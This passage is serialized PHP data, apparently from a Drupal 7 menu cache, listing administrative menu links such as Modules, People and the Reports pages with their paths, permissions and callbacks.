functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:13:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:260;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"260\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:352;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"352\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"352\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:353;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"353\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"353\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:354;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"354\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"354\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:355;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"355\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"355\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many 